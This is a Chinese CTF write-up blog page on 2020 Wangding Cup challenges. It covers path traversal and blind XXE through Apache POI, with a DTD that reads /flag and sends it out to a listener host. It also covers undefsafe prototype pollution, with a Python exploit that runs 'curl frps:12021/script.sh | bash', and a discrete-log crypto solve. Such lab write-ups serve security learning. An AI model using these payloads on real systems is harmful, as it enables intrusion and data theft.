<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 3.9.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/blog/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/blog/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/blog/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/blog/images/logo.svg" color="#222">

<link rel="stylesheet" href="/blog/css/main.css">


<link rel="stylesheet" href="/blog/lib/font-awesome/css/all.min.css">
  <link rel="stylesheet" href="//cdn.jsdelivr.net/gh/fancyapps/fancybox@3/dist/jquery.fancybox.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"sncker.github.io","root":"/blog/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":true,"show_result":true,"style":"mac"},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":true,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="青龙组的题。老烂尾文章了，复盘一下。   Webfilejava一道XXE的题目。先看到个上传功能，传完可以下载。在下载功能点存在任意文件下载漏洞。">
<meta name="keywords" content="网鼎杯,2020,线上">
<meta property="og:type" content="article">
<meta property="og:title" content="2020网鼎杯-WriteUp">
<meta property="og:url" content="https://sncker.github.io/2020/09/25/2020-网鼎杯-WriteUp/index.html">
<meta property="og:site_name" content="SNCKER&#39;s blog">
<meta property="og:description" content="青龙组的题。老烂尾文章了，复盘一下。   Webfilejava一道XXE的题目。先看到个上传功能，传完可以下载。在下载功能点存在任意文件下载漏洞。">
<meta property="og:locale" content="zh-CN">
<meta property="og:image" content="https://gitee.com/sncker/resource/raw/master/image/20200925173410.png">
<meta property="og:image" content="https://gitee.com/sncker/resource/raw/master/image/20200925173540.png">
<meta property="og:image" content="https://gitee.com/sncker/resource/raw/master/image/20200925173639.png">
<meta property="og:image" content="https://gitee.com/sncker/resource/raw/master/image/20200925174605.png">
<meta property="og:image" content="https://gitee.com/sncker/resource/raw/master/image/20200925175027.png">
<meta property="og:image" content="https://gitee.com/sncker/resource/raw/master/image/20200924200807.png">
<meta property="og:image" content="https://gitee.com/sncker/resource/raw/master/image/20200924200408.png">
<meta property="og:image" content="https://gitee.com/sncker/resource/raw/master/image/20200924113411.png">
<meta property="og:image" content="https://gitee.com/sncker/resource/raw/master/image/20200924114921.png">
<meta property="og:image" content="https://gitee.com/sncker/resource/raw/master/image/20200924193839.png">
<meta property="og:updated_time" content="2020-09-25T10:29:59.521Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="2020网鼎杯-WriteUp">
<meta name="twitter:description" content="青龙组的题。老烂尾文章了，复盘一下。   Webfilejava一道XXE的题目。先看到个上传功能，传完可以下载。在下载功能点存在任意文件下载漏洞。">
<meta name="twitter:image" content="https://gitee.com/sncker/resource/raw/master/image/20200925173410.png">

<link rel="canonical" href="https://sncker.github.io/2020/09/25/2020-网鼎杯-WriteUp/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>2020网鼎杯-WriteUp | SNCKER's blog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/blog/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">SNCKER's blog</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">想做开发但不会堆利用的渗透菜鸟</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/blog/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/blog/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/blog/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
        <li class="menu-item menu-item-link">

    <a href="/blog/link/" rel="section"><i class="fa fa-link fa-fw"></i>友链</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://sncker.github.io/2020/09/25/2020-网鼎杯-WriteUp/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="http://q1.qlogo.cn/g?b=qq&nk=948375961&s=640">
      <meta itemprop="name" content="SNCKER">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="SNCKER's blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          2020网鼎杯-WriteUp
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2020-09-25 09:48:00" itemprop="dateCreated datePublished" datetime="2020-09-25T09:48:00+08:00">2020-09-25</time>
            </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/blog/categories/CTF/" itemprop="url" rel="index"><span itemprop="name">CTF</span></a>
                </span>
                  ，
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/blog/categories/CTF/WriteUp/" itemprop="url" rel="index"><span itemprop="name">WriteUp</span></a>
                </span>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p>青龙组的题。老烂尾文章了，复盘一下。  </p>
<h1 id="Web"><a href="#Web" class="headerlink" title="Web"></a>Web</h1><h2 id="filejava"><a href="#filejava" class="headerlink" title="filejava"></a>filejava</h2><p>一道XXE的题目。<br>先看到个上传功能，传完可以下载。<br>在下载功能点存在任意文件下载漏洞。<br><img src="https://gitee.com/sncker/resource/raw/master/image/20200925173410.png" alt></p>
<a id="more"></a>
<p>当参数是个文件夹时还爆路径。<br><img src="https://gitee.com/sncker/resource/raw/master/image/20200925173540.png" alt><br>然后直接读<code>web.xml</code>文件。<br><img src="https://gitee.com/sncker/resource/raw/master/image/20200925173639.png" alt><br>利用任意下载漏洞把class文件都下载下来。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">?filename=../../../classes/cn/abc/servlet/DownloadServlet.class</span><br><span class="line">?filename=../../../classes/cn/abc/servlet/ListFileServlet.class</span><br><span class="line">?filename=../../../classes/cn/abc/servlet/UploadServlet.class</span><br></pre></td></tr></table></figure>

<p>反编译class进行代码审计。<br>下载功能中有个检测，防止直接下载flag文件。<br><img src="https://gitee.com/sncker/resource/raw/master/image/20200925174605.png" alt><br>在上传功能中会用<code>apache poi</code>库对<code>excel-</code>开头格式的xlsx文件进行处理。<br><img src="https://gitee.com/sncker/resource/raw/master/image/20200925175027.png" alt><br>在报错处理里提示了<code>poi</code>库版本为<code>3.10</code>，爆了个<code>CVE-2014-3529</code>，存在XXE漏洞。<br><strong>漏洞利用：</strong><br>新建xlsx文件名字以<code>excel-</code>开头，用解压软件打开，在<code>[Content_Types].xml</code>文件引入一个dtd（这里盲打，需要将flag打回服务器）。<br><img src="https://gitee.com/sncker/resource/raw/master/image/20200924200807.png" alt><br>dtd内容：</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">!ENTITY</span> % <span class="attr">file</span> <span class="attr">SYSTEM</span> "<span class="attr">file:</span>///<span class="attr">flag</span>"&gt;</span></span><br><span class="line">&lt;!ENTITY % getfile "&lt;!ENTITY &amp;#37; send SYSTEM 'http://frps:12020?f=%file;'&gt;"&gt;</span><br><span class="line">%getfile;</span><br><span class="line">%send;</span><br></pre></td></tr></table></figure>

<p>开http服务，nc监听，一气呵成，然后上传xlsx文件。<br><img src="https://gitee.com/sncker/resource/raw/master/image/20200924200408.png" alt></p>
<h2 id="Notes"><a href="#Notes" class="headerlink" title="Notes"></a>Notes</h2><p>一道nodejs的原型链污染。<br>直接给了源码，这里贴一下关键点。  </p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">var</span> express = <span class="built_in">require</span>(<span class="string">'express'</span>);</span><br><span class="line"><span class="keyword">var</span> path = <span class="built_in">require</span>(<span class="string">'path'</span>);</span><br><span class="line"><span class="keyword">const</span> undefsafe = <span class="built_in">require</span>(<span class="string">'undefsafe'</span>);</span><br><span class="line"><span class="keyword">const</span> &#123; exec &#125; = <span class="built_in">require</span>(<span class="string">'child_process'</span>);</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Notes</span> </span>&#123;</span><br><span class="line">    <span class="keyword">constructor</span>() &#123;</span><br><span class="line">        <span class="keyword">this</span>.owner = <span class="string">"whoknows"</span>;</span><br><span class="line">        <span class="keyword">this</span>.num = <span class="number">0</span>;</span><br><span class="line">        <span class="keyword">this</span>.note_list = &#123;&#125;;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    get_note(id) &#123;</span><br><span class="line">        <span class="keyword">var</span> r = &#123;&#125;</span><br><span class="line">        undefsafe(r, id, undefsafe(<span class="keyword">this</span>.note_list, id));</span><br><span class="line">        <span class="keyword">return</span> r;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    edit_note(id, author, raw) &#123;</span><br><span class="line">        undefsafe(<span class="keyword">this</span>.note_list, id + <span class="string">'.author'</span>, author);</span><br><span class="line">        undefsafe(<span class="keyword">this</span>.note_list, id + <span class="string">'.raw_note'</span>, raw);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">var</span> notes = <span class="keyword">new</span> Notes();</span><br><span class="line"></span><br><span class="line">app.route(<span class="string">'/edit_note'</span>)</span><br><span class="line">    .get(<span class="function"><span class="keyword">function</span>(<span class="params">req, res</span>) </span>&#123;</span><br><span class="line">        res.render(<span class="string">'mess'</span>, &#123;<span class="attr">message</span>: <span class="string">"please use POST to edit a note"</span>&#125;);</span><br><span class="line">    &#125;)</span><br><span class="line">    .post(<span class="function"><span class="keyword">function</span>(<span class="params">req, res</span>) </span>&#123;</span><br><span class="line">        <span class="keyword">let</span> id = req.body.id;</span><br><span class="line">        <span class="keyword">let</span> author = req.body.author;</span><br><span class="line">        <span class="keyword">let</span> enote = req.body.raw;</span><br><span class="line">        <span class="keyword">if</span> (id &amp;&amp; author &amp;&amp; enote) &#123;</span><br><span class="line">            notes.edit_note(id, author, enote);</span><br><span class="line">            res.render(<span class="string">'mess'</span>, &#123;<span class="attr">message</span>: <span class="string">"edit note sucess"</span>&#125;);</span><br><span class="line">        &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">            res.render(<span class="string">'mess'</span>, &#123;<span class="attr">message</span>: <span class="string">"edit note failed"</span>&#125;);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;)</span><br><span class="line"></span><br><span class="line">app.route(<span class="string">'/status'</span>)</span><br><span class="line">    .get(<span class="function"><span class="keyword">function</span>(<span class="params">req, res</span>) </span>&#123;</span><br><span class="line">        <span class="keyword">let</span> commands = &#123;</span><br><span class="line">            <span class="string">"script-1"</span>: <span class="string">"uptime"</span>,</span><br><span class="line">            <span class="string">"script-2"</span>: <span class="string">"free -m"</span></span><br><span class="line">        &#125;;</span><br><span class="line">        <span class="keyword">for</span> (<span class="keyword">let</span> index <span class="keyword">in</span> commands) &#123;</span><br><span class="line">            exec(commands[index], &#123;<span class="attr">shell</span>:<span class="string">'/bin/bash'</span>&#125;, (err, stdout, stderr) =&gt; &#123;</span><br><span class="line">                <span class="keyword">if</span> (err) &#123;</span><br><span class="line">                    <span class="keyword">return</span>;</span><br><span class="line">                &#125;</span><br><span class="line">                <span class="built_in">console</span>.log(<span class="string">`stdout: <span class="subst">$&#123;stdout&#125;</span>`</span>);</span><br><span class="line">            &#125;);</span><br><span class="line">        &#125;</span><br><span class="line">        res.send(<span class="string">'OK'</span>);</span><br><span class="line">        res.end();</span><br><span class="line">    &#125;)</span><br><span class="line"></span><br><span class="line"><span class="keyword">const</span> port = <span class="number">8080</span>;</span><br><span class="line">app.listen(port, () =&gt; <span class="built_in">console</span>.log(<span class="string">`Example app listening at http://localhost:<span class="subst">$&#123;port&#125;</span>`</span>))</span><br></pre></td></tr></table></figure>

<p>引了<code>undefsafe</code>模块。<code>CVE-2019-10795</code>爆的<code>2.0.3</code>以下低版本存在原型链污染漏洞。</p>
<p>先找模块引用点。<br><img src="https://gitee.com/sncker/resource/raw/master/image/20200924113411.png" alt></p>
<p>查看路由知道在<code>edit_note</code>中我们可以控制<code>undefsafe</code>的2,3参数，那么就可以触发原型链污染漏洞。<br>接下来就要查找利用点，在<code>/status</code>路由中有命令执行的地方，命令是预先定义好然后通过遍历逐个执行。<code>for...in...</code>会遍历原型链上的可枚举属性。那么我们可以通过污染字典原型来增加一个可控的可遍历属性，从而达到任意命令执行的目的。<br><img src="https://gitee.com/sncker/resource/raw/master/image/20200924114921.png" alt><br><strong>攻击过程解析：</strong><br><code>POST /edit_note</code>路由传入<code>id=__proto__.aaa&amp;author={command}&amp;raw=111</code><br>函数就会访问<code>note_list</code>字典的属性<code>__proto__.aaa.author</code>。因为<code>aaa</code>是不存在的属性，所以最后函数会将<code>author</code>参数的值赋给<code>__proto__.author</code>从而在字典原型中添加了一个<code>author</code>属性。每个实例使用<code>for...in...</code>都会遍历到这个属性。<br>exp:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Exp</span>:</span></span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">def</span> <span class="title">__init__</span><span class="params">(self, url, command)</span>:</span></span><br><span class="line">        self.url = url</span><br><span class="line">        self.command = command</span><br><span class="line">        self.pwn()</span><br><span class="line">        </span><br><span class="line">    <span class="function"><span class="keyword">def</span> <span class="title">edit_note</span><span class="params">(self, note_id, note_author, note_raw)</span>:</span></span><br><span class="line">        data = &#123;</span><br><span class="line">            <span class="string">'id'</span>: note_id,</span><br><span class="line">            <span class="string">'author'</span>: note_author,</span><br><span class="line">            <span class="string">'raw'</span>: note_raw</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">try</span>:</span><br><span class="line">            requests.post(self.url + <span class="string">'/edit_note'</span>, data=data)</span><br><span class="line">            print(<span class="string">"[+] edit note success."</span>)</span><br><span class="line"></span><br><span class="line">        <span class="keyword">except</span> Exception <span class="keyword">as</span> e:</span><br><span class="line">            print(<span class="string">"[-] %s\n[-] edit note fail."</span>%(e))</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">def</span> <span class="title">pwn</span><span class="params">(self)</span>:</span></span><br><span class="line">        self.edit_note(<span class="string">'__proto__.aaa'</span>, self.command, <span class="string">'exp'</span>)</span><br><span class="line">        <span class="keyword">try</span>:</span><br><span class="line">            requests.get(self.url + <span class="string">'/status'</span>)</span><br><span class="line">            print(<span class="string">"[+] command executed."</span>)</span><br><span class="line"></span><br><span class="line">        <span class="keyword">except</span> Exception <span class="keyword">as</span> e:</span><br><span class="line">            print(<span class="string">"[-] %s\n[-] command execution fails."</span>%(e))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">main</span><span class="params">()</span>:</span></span><br><span class="line">    url = <span class="string">"http://953895c7-9fbc-4bcd-8360-663f78b494c6.node3.buuoj.cn"</span></span><br><span class="line">    command = <span class="string">"curl frps:12021/script.sh | bash"</span></span><br><span class="line">    exp = Exp(url, command)</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">'__main__'</span>:</span><br><span class="line">    main()</span><br></pre></td></tr></table></figure>

<p><img src="https://gitee.com/sncker/resource/raw/master/image/20200924193839.png" alt></p>
<h1 id="Crypto"><a href="#Crypto" class="headerlink" title="Crypto"></a>Crypto</h1><h2 id="you-raise-me-up"><a href="#you-raise-me-up" class="headerlink" title="you_raise_me_up"></a>you_raise_me_up</h2><p>题目  </p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/env python</span></span><br><span class="line"><span class="comment"># -*- coding: utf-8 -*-</span></span><br><span class="line"><span class="keyword">from</span> Crypto.Util.number <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> random</span><br><span class="line"></span><br><span class="line">n = <span class="number">2</span> ** <span class="number">512</span></span><br><span class="line">m = random.randint(<span class="number">2</span>, n<span class="number">-1</span>) | <span class="number">1</span></span><br><span class="line">c = pow(m, bytes_to_long(flag), n)</span><br><span class="line"><span class="keyword">print</span> <span class="string">'m = '</span> + str(m)</span><br><span class="line"><span class="keyword">print</span> <span class="string">'c = '</span> + str(c)</span><br><span class="line"></span><br><span class="line"><span class="comment"># m = 391190709124527428959489662565274039318305952172936859403855079581402770986890308469084735451207885386318986881041563704825943945069343345307381099559075</span></span><br><span class="line"><span class="comment"># c = 6665851394203214245856789450723658632520816791621796775909766895233000234023642878786025644953797995373211308485605397024123180085924117610802485972584499</span></span><br></pre></td></tr></table></figure>

<p>看主要式子</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">c = m^flag % n</span><br></pre></td></tr></table></figure>

<p><code>c, m, n</code>已知。求flag，就是求解离散对数问题。<br>可以用小步大步BSGS算法去解，Pohlig-Hellman算法貌似要特殊情况，没试过。<br>直接拿一个ACM用的C的模板溢出了，用python来实现也溢出了。<br>后来学到了一个科学计算库sympy。<br>利用里面的<code>discrete_log</code>，可以自动选择算法计算。<br>贴个官方文档<br><a href="https://docs.sympy.org/latest/modules/ntheory.html?highlight=discrete_log#sympy.ntheory.residue_ntheory.discrete_log" target="_blank" rel="noopener">https://docs.sympy.org/latest/modules/ntheory.html?highlight=discrete_log#sympy.ntheory.residue_ntheory.discrete_log</a></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> sympy.ntheory <span class="keyword">import</span> discrete_log</span><br><span class="line"></span><br><span class="line">n = <span class="number">2</span>**<span class="number">512</span></span><br><span class="line">m = <span class="number">391190709124527428959489662565274039318305952172936859403855079581402770986890308469084735451207885386318986881041563704825943945069343345307381099559075</span></span><br><span class="line">c = <span class="number">6665851394203214245856789450723658632520816791621796775909766895233000234023642878786025644953797995373211308485605397024123180085924117610802485972584499</span></span><br><span class="line">print(discrete_log(n,c,m))</span><br></pre></td></tr></table></figure>

<p>跑出来解码一下就行了。  </p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">flag&#123;5f95ca93-1594-762d-ed0b-a9139692cb4a&#125;</span><br></pre></td></tr></table></figure>
    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/blog/tags/网鼎杯/" rel="tag"># 网鼎杯</a>
              <a href="/blog/tags/2020/" rel="tag"># 2020</a>
              <a href="/blog/tags/线上/" rel="tag"># 线上</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/blog/2020/08/26/2020强网杯Online-WriteUp/" rel="prev" title="2020强网杯Online-WriteUp">
      <i class="fa fa-chevron-left"></i> 2020强网杯Online-WriteUp
    </a></div>
      <div class="post-nav-item">
    <a href="/blog/2020/10/15/初探ICMP隧道/" rel="next" title="初探ICMP隧道">
      初探ICMP隧道 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#Web"><span class="nav-number">1.</span> <span class="nav-text">Web</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#filejava"><span class="nav-number">1.1.</span> <span class="nav-text">filejava</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Notes"><span class="nav-number">1.2.</span> <span class="nav-text">Notes</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Crypto"><span class="nav-number">2.</span> <span class="nav-text">Crypto</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#you-raise-me-up"><span class="nav-number">2.1.</span> <span class="nav-text">you_raise_me_up</span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="SNCKER"
      src="http://q1.qlogo.cn/g?b=qq&nk=948375961&s=640">
  <p class="site-author-name" itemprop="name">SNCKER</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/blog/archives/">
        
          <span class="site-state-item-count">22</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/blog/categories/">
          
        <span class="site-state-item-count">8</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
        <span class="site-state-item-count">24</span>
        <span class="site-state-item-name">标签</span>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">SNCKER</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/blog/lib/anime.min.js"></script>
  <script src="//cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js"></script>
  <script src="//cdn.jsdelivr.net/gh/fancyapps/fancybox@3/dist/jquery.fancybox.min.js"></script>
  <script src="/blog/lib/velocity/velocity.min.js"></script>
  <script src="/blog/lib/velocity/velocity.ui.min.js"></script>
<script src="/blog/js/utils.js"></script><script src="/blog/js/motion.js"></script>
<script src="/blog/js/schemes/pisces.js"></script>
<script src="/blog/js/next-boot.js"></script>



  















  

  

  <!-- 页面点击小红心 -->
  <script type="text/javascript" src="/blog/js/love.js"></script>
</body>
</html>
